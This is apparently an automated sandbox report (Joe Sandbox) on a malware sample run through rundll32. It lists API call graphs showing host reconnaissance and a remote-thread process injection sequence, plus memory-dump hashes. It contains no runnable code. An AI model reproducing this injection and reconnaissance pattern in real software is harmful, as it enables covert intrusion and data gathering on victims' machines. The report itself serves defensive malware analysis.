LdrGetProcedureAddress 19739->19740 19741 29f3b8ef36a 19740->19741 19742 29f3b8ecce0 LdrGetProcedureAddress 19741->19742 19743 
29f3b8ef389 19742->19743 19744 29f3b8ecce0 LdrGetProcedureAddress 19743->19744 19745 29f3b8ef3a8 19744->19745 19746 29f3b8ecce0 LdrGetProcedureAddress 19745->19746 19747 29f3b8ef3c7 19746->19747 19748 29f3b8ecce0 LdrGetProcedureAddress 19747->19748 19749 29f3b8ef3e6 19748->19749 19750 29f3b8ecce0 LdrGetProcedureAddress 19749->19750 19751 29f3b8ef405 19750->19751 19752 29f3b8ecce0 LdrGetProcedureAddress 19751->19752 19753 29f3b8ef424 19752->19753 19754 29f3b8ecce0 LdrGetProcedureAddress 19753->19754 19755 29f3b8ef443 19754->19755 19756 29f3b8ecce0 LdrGetProcedureAddress 19755->19756 19757 29f3b8ef462 19756->19757 19758 29f3b8ecce0 LdrGetProcedureAddress 19757->19758 19759 29f3b8ef481 19758->19759 19760 29f3b8ecce0 LdrGetProcedureAddress 19759->19760 19761 29f3b8ef4a0 19760->19761 19762 29f3b8ecce0 LdrGetProcedureAddress 19761->19762 19763 29f3b8ef4bf 19762->19763 19764 29f3b8ecce0 LdrGetProcedureAddress 19763->19764 19765 29f3b8ef4de 19764->19765 19766 29f3b8ecce0 LdrGetProcedureAddress 19765->19766 19767 29f3b8ef4fd 19766->19767 19768 29f3b8ecce0 LdrGetProcedureAddress 19767->19768 19769 29f3b8ef51c 19768->19769 19770 29f3b8ecce0 LdrGetProcedureAddress 19769->19770 19771 29f3b8ef53b 19770->19771 19772 29f3b8ecce0 LdrGetProcedureAddress 19771->19772 19773 29f3b8ef55a 19772->19773 19774 29f3b8ecce0 LdrGetProcedureAddress 19773->19774 19775 29f3b8ef579 19774->19775 19776 29f3b8ecce0 LdrGetProcedureAddress 19775->19776 19777 29f3b8ef598 19776->19777 19778 29f3b8ecce0 LdrGetProcedureAddress 19777->19778 19779 29f3b8ef5b7 19778->19779 19780 29f3b8ecce0 LdrGetProcedureAddress 19779->19780 19781 29f3b8ef5d6 19780->19781 19782 29f3b8ecce0 LdrGetProcedureAddress 19781->19782 19782->19651 20164 29f3b904ce0 19783->20164 19788 29f3b913de0 RtlFreeHeap 19789 29f3b8e90af 19788->19789 19790 29f3b913de0 RtlFreeHeap 19789->19790 19791 29f3b8e9110 19790->19791 19792 29f3b913de0 RtlFreeHeap 19791->19792 19793 29f3b8e916c 19792->19793 19794 29f3b913de0 RtlFreeHeap 19793->19794 19795 
29f3b8e91a1 19794->19795 19796 29f3b913de0 RtlFreeHeap 19795->19796 19797 29f3b8e91f1 19796->19797 19798 29f3b913de0 RtlFreeHeap 19797->19798 19799 29f3b8e9222 19798->19799 19800 29f3b913de0 RtlFreeHeap 19799->19800 19801 29f3b8e925a 19800->19801 19802 29f3b913de0 RtlFreeHeap 19801->19802 19803 29f3b8e92af 19802->19803 19804 29f3b913de0 RtlFreeHeap 19803->19804 19805 29f3b8e92f1 19804->19805 19806 29f3b913de0 RtlFreeHeap 19805->19806 19807 29f3b8e9333 19806->19807 19808 29f3b913de0 RtlFreeHeap 19807->19808 19809 29f3b8e9347 19808->19809 19810 29f3b913de0 RtlFreeHeap 19809->19810 19811 29f3b8e9362 19810->19811 19812 29f3b913de0 RtlFreeHeap 19811->19812 19813 29f3b8e938e 19812->19813 19814 29f3b913de0 RtlFreeHeap 19813->19814 19815 29f3b8e93c1 19814->19815 19815->19632 19817 29f3b8e7f99 19816->19817 19818 29f3b8e7fb8 19816->19818 19819 29f3b913de0 RtlFreeHeap 19817->19819 19820 29f3b8e7fda 19818->19820 19821 29f3b913de0 RtlFreeHeap 19818->19821 19819->19818 20170 29f3b905560 19820->20170 19821->19820 19825 29f3b905560 RtlFreeHeap 19829 29f3b8e8066 19825->19829 19826 29f3b8e802a 19826->19825 19827 29f3b8e8088 19828 29f3b905560 RtlFreeHeap 19827->19828 19833 29f3b8e809c 19828->19833 19829->19827 19831 29f3b90b4e0 RtlFreeHeap 19829->19831 19830 29f3b8e80be 19832 29f3b905560 RtlFreeHeap 19830->19832 19831->19827 19837 29f3b8e80d2 19832->19837 19833->19830 19834 29f3b90b4e0 RtlFreeHeap 19833->19834 19834->19830 19835 29f3b8e80f4 19836 29f3b905560 RtlFreeHeap 19835->19836 19841 29f3b8e8108 19836->19841 19837->19835 19838 29f3b90b4e0 RtlFreeHeap 19837->19838 19838->19835 19839 29f3b8e812a 19840 29f3b905560 RtlFreeHeap 19839->19840 19845 29f3b8e813e 19840->19845 19841->19839 19842 29f3b90b4e0 RtlFreeHeap 19841->19842 19842->19839 19843 29f3b8e8160 19844 29f3b905560 RtlFreeHeap 19843->19844 19849 29f3b8e8174 19844->19849 19845->19843 19846 29f3b90b4e0 RtlFreeHeap 19845->19846 19846->19843 19847 29f3b8e8197 19848 29f3b905560 RtlFreeHeap 19847->19848 19853 29f3b8e81ab 
19848->19853 19849->19847 19851 29f3b90b4e0 RtlFreeHeap 19849->19851 19850 29f3b8e81d4 19852 29f3b905560 RtlFreeHeap 19850->19852 19851->19847 19854 29f3b8e81e8 19852->19854 19853->19850 19855 29f3b90b4e0 RtlFreeHeap 19853->19855 19856 29f3b8e823d 19854->19856 19858 29f3b8fbe20 RtlFreeHeap 19854->19858 19855->19850 19857 29f3b905560 RtlFreeHeap 19856->19857 19878 29f3b8e8251 19857->19878 19859 29f3b8e8214 19858->19859 19863 29f3b90b4e0 RtlFreeHeap 19859->19863 19860 29f3b8e838a 19861 29f3b905560 RtlFreeHeap 19860->19861 19862 29f3b8e839e 19861->19862 19865 29f3b905560 RtlFreeHeap 19862->19865 19864 29f3b8e8235 19863->19864 19866 29f3b90b4e0 RtlFreeHeap 19864->19866 19870 29f3b8e83ba 19865->19870 19866->19856 19867 29f3b8e8b86 19867->19634 19868 29f3b8e8430 19869 29f3b905560 RtlFreeHeap 19868->19869 19871 29f3b8e8444 19869->19871 19870->19867 19870->19868 19883 29f3b90b4e0 RtlFreeHeap 19870->19883 19872 29f3b8e846d 19871->19872 19876 29f3b8fbe20 RtlFreeHeap 19871->19876 19881 29f3b905560 RtlFreeHeap 19872->19881 19873 29f3b8e8322 19874 29f3b8e835d 19873->19874 19886 29f3b8ea050 RtlFreeHeap 19873->19886 19875 29f3b90b4e0 RtlFreeHeap 19874->19875 19879 29f3b8e837d 19875->19879 19880 29f3b8e8460 19876->19880 19878->19860 19878->19873 20178 29f3b8ea050 19878->20178 19884 29f3b90b4e0 RtlFreeHeap 19879->19884 19885 29f3b90b4e0 RtlFreeHeap 19880->19885 19882 29f3b8e848e 19881->19882 19887 29f3b8e84b7 19882->19887 19889 29f3b8fbe20 RtlFreeHeap 19882->19889 19888 29f3b8e8423 19883->19888 19884->19860 19885->19872 19886->19874 19892 29f3b905560 RtlFreeHeap 19887->19892 19890 29f3b90b4e0 RtlFreeHeap 19888->19890 19891 29f3b8e84aa 19889->19891 19890->19868 19893 29f3b90b4e0 RtlFreeHeap 19891->19893 19894 29f3b8e84d8 19892->19894 19893->19887 19895 29f3b8e8501 19894->19895 19896 29f3b8fbe20 RtlFreeHeap 19894->19896 19897 29f3b905560 RtlFreeHeap 19895->19897 19898 29f3b8e84f4 19896->19898 19899 29f3b8e8522 19897->19899 19900 29f3b90b4e0 RtlFreeHeap 19898->19900 19901 29f3b8e854b 
19899->19901 19902 29f3b8fbe20 RtlFreeHeap 19899->19902 19900->19895 19904 29f3b905560 RtlFreeHeap 19901->19904 19903 29f3b8e853e 19902->19903 19905 29f3b90b4e0 RtlFreeHeap 19903->19905 19906 29f3b8e856c 19904->19906 19905->19901 19907 29f3b8e8595 19906->19907 19908 29f3b8fbe20 RtlFreeHeap 19906->19908 19909 29f3b905560 RtlFreeHeap 19907->19909 19910 29f3b8e8588 19908->19910 19911 29f3b8e85b6 19909->19911 19912 29f3b90b4e0 RtlFreeHeap 19910->19912 19913 29f3b905560 RtlFreeHeap 19911->19913 19912->19907 19914 29f3b8e85d2 19913->19914 19914->19867 19915 29f3b90b4e0 RtlFreeHeap 19914->19915 19916 29f3b8e8625 19915->19916 19917 29f3b90b4e0 RtlFreeHeap 19916->19917 19918 29f3b8e865e 19917->19918 19919 29f3b905560 RtlFreeHeap 19918->19919 19920 29f3b8e8672 19919->19920 19920->19867 19921 29f3b90b4e0 RtlFreeHeap 19920->19921 19922 29f3b8e8797 19921->19922 19923 29f3b90b4e0 RtlFreeHeap 19922->19923 19924 29f3b8e87a4 19923->19924 19925 29f3b905560 RtlFreeHeap 19924->19925 19926 29f3b8e87b8 19925->19926 19926->19867 19927 29f3b90b4e0 RtlFreeHeap 19926->19927 19928 29f3b8e87ec 19927->19928 19929 29f3b905560 RtlFreeHeap 19928->19929 19930 29f3b8e8800 19929->19930 19930->19867 19931 29f3b90b4e0 RtlFreeHeap 19930->19931 19932 29f3b8e882d 19931->19932 19933 29f3b905560 RtlFreeHeap 19932->19933 19934 29f3b8e8841 19933->19934 19935 29f3b905560 RtlFreeHeap 19934->19935 19936 29f3b8e885d 19935->19936 19936->19867 19937 29f3b90b4e0 RtlFreeHeap 19936->19937 19938 29f3b8e8897 19937->19938 19939 29f3b905560 RtlFreeHeap 19938->19939 19940 29f3b8e88ab 19939->19940 19940->19867 19941 29f3b90b4e0 RtlFreeHeap 19940->19941 19942 29f3b8e89c8 19941->19942 19943 29f3b90b4e0 RtlFreeHeap 19942->19943 19944 29f3b8e89d5 19943->19944 19945 29f3b905560 RtlFreeHeap 19944->19945 19954 29f3b8e89eb 19945->19954 19946 29f3b8e8aec 19950 29f3b8fbe20 RtlFreeHeap 19946->19950 19956 29f3b8e8b47 19946->19956 19947 29f3b90b4e0 RtlFreeHeap 19949 29f3b8e8b79 19947->19949 19948 29f3b8fbe20 RtlFreeHeap 19948->19954 
19951 29f3b90b4e0 RtlFreeHeap 19949->19951 19952 29f3b8e8b2a 19950->19952 19951->19867 19955 29f3b90b4e0 RtlFreeHeap 19952->19955 19953 29f3b90b4e0 RtlFreeHeap 19953->19954 19954->19867 19954->19946 19954->19948 19954->19953 19955->19956 19956->19947 19958 29f3b904db1 19957->19958 19959 29f3b904dc7 GetComputerNameExW 19957->19959 19958->19959 19960 29f3b904def 19959->19960 19961 29f3b904df3 GetTokenInformation 19960->19961 19966 29f3b904e4e 19960->19966 19962 29f3b904e1c 19961->19962 19961->19966 19963 29f3b904e3e 19962->19963 19964 29f3b913de0 RtlFreeHeap 19962->19964 19965 29f3b913de0 RtlFreeHeap 19963->19965 19964->19963 19965->19966 19967 29f3b8fdfc0 RtlFreeHeap 19966->19967 19968 29f3b904e90 19967->19968 19969 29f3b904eaa GetNativeSystemInfo 19968->19969 19970 29f3b913de0 RtlFreeHeap 19968->19970 19971 29f3b904ed3 19969->19971 19972 29f3b904ee8 19969->19972 19970->19969 19974 29f3b913de0 RtlFreeHeap 19971->19974 19972->19971 19973 29f3b904f17 19972->19973 19975 29f3b913de0 RtlFreeHeap 19973->19975 19976 29f3b904f15 19974->19976 19975->19976 19978 29f3b913de0 RtlFreeHeap 19976->19978 19981 29f3b904f67 19976->19981 19977 29f3b904f8f GetAdaptersInfo 19979 29f3b904fbb 19977->19979 19980 29f3b904fdd 19977->19980 19978->19981 19982 29f3b90b4e0 RtlFreeHeap 19979->19982 19980->19979 19984 29f3b904fea GetAdaptersInfo 19980->19984 19981->19977 19983 29f3b904fc5 19982->19983 19985 29f3b90b4e0 RtlFreeHeap 19983->19985 19984->19979 19988 29f3b904fff 19984->19988 19986 29f3b904fcd 19985->19986 19986->19637 19987 29f3b913de0 RtlFreeHeap 19987->19988 19988->19979 19988->19987 19991 29f3b914759 19989->19991 19990 29f3b9147af 19990->19643 19991->19990 19992 29f3b9147ad NtFreeVirtualMemory 19991->19992 19992->19990 20182 29f3b8f3270 19993->20182 19996 29f3b913de0 RtlFreeHeap 19997 29f3b8f3ebe 19996->19997 19998 29f3b913de0 RtlFreeHeap 19997->19998 19999 29f3b8f3ee0 19998->19999 20000 29f3b913de0 RtlFreeHeap 19999->20000 20001 29f3b8f3f02 20000->20001 20002 29f3b90b4e0 
RtlFreeHeap 20001->20002 20003 29f3b8f3f1d 20002->20003 20004 29f3b90b4e0 RtlFreeHeap 20003->20004 20005 29f3b8f3f61 20004->20005 20006 29f3b8f3fd7 20005->20006 20008 29f3b8f3fd9 20005->20008 20009 29f3b8f3fc0 20005->20009 20007 29f3b8ea050 RtlFreeHeap 20006->20007 20010 29f3b8f4005 20006->20010 20007->20010 20011 29f3b8ea050 RtlFreeHeap 20008->20011 20009->20006 20013 29f3b8ea050 RtlFreeHeap 20009->20013 20012 29f3b90b4e0 RtlFreeHeap 20010->20012 20011->20006 20014 29f3b8f400d 20012->20014 20013->20006 20015 29f3b90b4e0 RtlFreeHeap 20014->20015 20016 29f3b8f4015 20015->20016 20017 29f3b8f4067 20016->20017 20018 29f3b8f4060 20016->20018 20282 29f3b8e7830 20017->20282 20206 29f3b8f6fa0 20018->20206 20021 29f3b8f4065 20022 29f3b90b4e0 RtlFreeHeap 20021->20022 20023 29f3b8f407f 20022->20023 20024 29f3b8f40bb 20023->20024 20025 29f3b8fbe20 RtlFreeHeap 20023->20025 20026 29f3b90b4e0 RtlFreeHeap 20024->20026 20027 29f3b8f40ac 20025->20027 20028 29f3b8f411c 20026->20028 20029 29f3b8f40b3 20027->20029 20037 29f3b8f40bd 20027->20037 20030 29f3b90b4e0 RtlFreeHeap 20028->20030 20031 29f3b90b4e0 RtlFreeHeap 20029->20031 20032 29f3b8f4124 20030->20032 20031->20024 20033 29f3b90b4e0 RtlFreeHeap 20032->20033 20034 29f3b8f412c 20033->20034 20035 29f3b90b4e0 RtlFreeHeap 20034->20035 20036 29f3b8f4139 20035->20036 20036->19643 20038 29f3b90b4e0 RtlFreeHeap 20037->20038 20038->20024 20040 29f3b8e8bde 20039->20040 20041 29f3b8ea050 RtlFreeHeap 20040->20041 20042 29f3b8e8c5e 20041->20042 20043 29f3b8ea050 RtlFreeHeap 20042->20043 20044 29f3b8e8c97 20043->20044 20045 29f3b90b4e0 RtlFreeHeap 20044->20045 20046 29f3b8e8cee 20045->20046 20047 29f3b8e8d5c 20046->20047 20049 29f3b8e8d5e 20046->20049 20050 29f3b8e8d44 20046->20050 20048 29f3b8ea050 RtlFreeHeap 20047->20048 20052 29f3b8e8d8b 20047->20052 20048->20052 20051 29f3b8ea050 RtlFreeHeap 20049->20051 20050->20047 20054 29f3b8ea050 RtlFreeHeap 20050->20054 20051->20047 20053 29f3b90b4e0 RtlFreeHeap 20052->20053 20055 29f3b8e8d93 

Control-flow Graph

[Control-flow graph, nodes 76 to 139, starting at block 29f3b904d00-29f3b904daf; legend: Executed / Not Executed. API calls named in the graph: GetUserNameW, GetComputerNameExW, GetTokenInformation, GetNativeSystemInfo, GetAdaptersInfo.]

Memory Dump Source
• Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
Similarity
• API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
• String ID:
• API String ID: 1596153048-0
• Opcode ID: fc528667e9177e2c198aa73658bdcfe4b0ce47abc5a9d58c6fb41e03184e1b56
• Instruction ID: b28abb9712da1afe79b65cd2eb6e205b63f69ed87284a011336d8653326d0c7b
• Opcode Fuzzy Hash: fc528667e9177e2c198aa73658bdcfe4b0ce47abc5a9d58c6fb41e03184e1b56
• Instruction Fuzzy Hash: 91A1E530218B848FEBD4BB14D9697FAB7E1FBD4301F40457DA44AC3291DA78DA45CB86

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 143 273f41380-273f413cc Sleep VirtualAllocEx 144 273f41456-273f41466 143->144 145 273f413d2-273f41400 WriteProcessMemory 143->145 146 273f41402-273f4143a CreateRemoteThread 145->146 147 273f41453 145->147 146->144 148 273f4143c-273f4143e 146->148 147->144 149 273f4144e-273f41451 148->149 150 273f41440-273f41448 WaitForSingleObject 148->150 149->144 150->149
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2567889790.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567827324.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            • Associated: 00000017.00000002.2567889790.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3172812169-2766056989
                                                                                                                                                                                                                            • Opcode ID: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                            • Instruction ID: 70ca693b3c1452cbeb4233b6b91bedeb956dc212f3bce1284f7759b325db5040
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F117F22709E9042F6A0CF26BC08B5666A0B789FF4F644324EFBD17BE5DB38C6059605

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                            • API String ID: 3779972765-4108050209
                                                                                                                                                                                                                            • Opcode ID: 9e1099e21e8aa8a75778dab0f0003b72168b0ca433e7e7463a7c69df624acbf5
                                                                                                                                                                                                                            • Instruction ID: 46a64b292ea0512da4c3bc41108d55d042a9d5c27f425ce5719e7fa374485aaa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e1099e21e8aa8a75778dab0f0003b72168b0ca433e7e7463a7c69df624acbf5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D719F70218B888FE7D4EF68D459BAAB7D1FB88305F5046BDA44DC3291DB78D4068B46
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1593494447.00007DF49BA40000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF49BA40000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_7df49ba40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3332741929-2766056989
                                                                                                                                                                                                                            • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                            • Instruction ID: 12426e41f99379f5bf9499ca6e3bc7420db13de84a9169a75cf85952742d63e4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4671D131614A4C8FEF94EF5CC858BA937E1FB98315F10462AE81EC72A0DB74D954DB84

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Fiber$CreateDelete
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2527733159-0
                                                                                                                                                                                                                            • Opcode ID: 6af399a1dc89570af37a1901f8c16fa5b317a926a8c3e6f0b868bb979e7e6e26
                                                                                                                                                                                                                            • Instruction ID: 8b5d2e0876120d7ee1288e31d97f6ff13d9ba12ce6bae6571f8a6989a9f915e1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6af399a1dc89570af37a1901f8c16fa5b317a926a8c3e6f0b868bb979e7e6e26
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED5109306189448BE7E8BB28AD5937573D5FB58312F20077DE89AC31E1DA389C2386D5
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1593494447.00007DF49BA40000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF49BA40000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_7df49ba40000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3280610774-0
                                                                                                                                                                                                                            • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                            • Instruction ID: 5abd378179bb0ff7636c03aef329a95ab76dbbbbf588fc0a92e9be678559848e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B21CD3071494C8FEBA5EB6CCC58BEA33E2FB98310F404226D41EDB290DE759A449750

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExitThreadUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3424019298-0
                                                                                                                                                                                                                            • Opcode ID: 9a1514e0302c050ca97904b6743693543049edcd165f1a0e5e1e29fab2aaa942
                                                                                                                                                                                                                            • Instruction ID: df52469f3670ad0620f52a0779cf67737823fce6688d7188924976669336088f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a1514e0302c050ca97904b6743693543049edcd165f1a0e5e1e29fab2aaa942
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551D7742189484FE788FF28D9597B5B7E1FB56311F10426DE497C32A2CB38E812CB55

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProcedure
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3653107232-0
                                                                                                                                                                                                                            • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                            • Instruction ID: df5da969d778b42ef61692358c555443ed11654958a53b53f4f84f1e9579fd71
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95310731618B485BD7E4AF08DC4A7BAB7E0FB85311F50066EE486C3351D635B8568BCB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFirstSnapshotThread32Toolhelp32
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 490256885-0
                                                                                                                                                                                                                            • Opcode ID: 194a83f98997e6115fdfa67c3893d78de7fc9e6bba17d4b3dc6bce5c589a6293
                                                                                                                                                                                                                            • Instruction ID: 2f5e439efed123e88f8c478f175aaf9c1a26f47a52f1fab117cfc48d9bfa5b09
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 194a83f98997e6115fdfa67c3893d78de7fc9e6bba17d4b3dc6bce5c589a6293
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09728370118B488FE7E4EF18D899BA577E0FB98305F2146BD944DC7396CB34A846CB82
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000002.2580013466.0000029F3B8E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000029F3B8E1000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_2_29f3b8e1000_rundll32.jbxd
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            • Instruction ID: eff7e84a1e756b43126cbe68909f7d8e705942537d0f9e0248f277c8f669832d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5601DB30628B458FF7C8BB1894273B573E1F789711F10456EE449C3391D639E9414E87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                            • Instruction ID: bb0a8d686d3f5a4e88d1126d7d54a4174b7ab0ff1ebbc7a5a569bcff71bfad6a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba3f95c2c9417701ba101d61fb74fecea45e223f9a8c54239b1753508d96a613
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF0F470618B448BE384DF1884C923677E1FBD8746F24052EE899C7361CB319842CB47
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_23_3_29f3b7a0000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                            • Instruction ID: 4b43620edf0ed56e9615379ca488d5bcf9a2a716fef1c2922ec0e125c49af9b9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe48e069b0bf4257b6ece8509336bdb1b8fe3d1efb0e08b23792c235e305b72c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF0A470628B408BE784DF1884CA67677E1FBD8746F24452EE899C7361CB3598828B47
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000017.00000003.1448734895.0000029F3B7A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029F3B7A0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
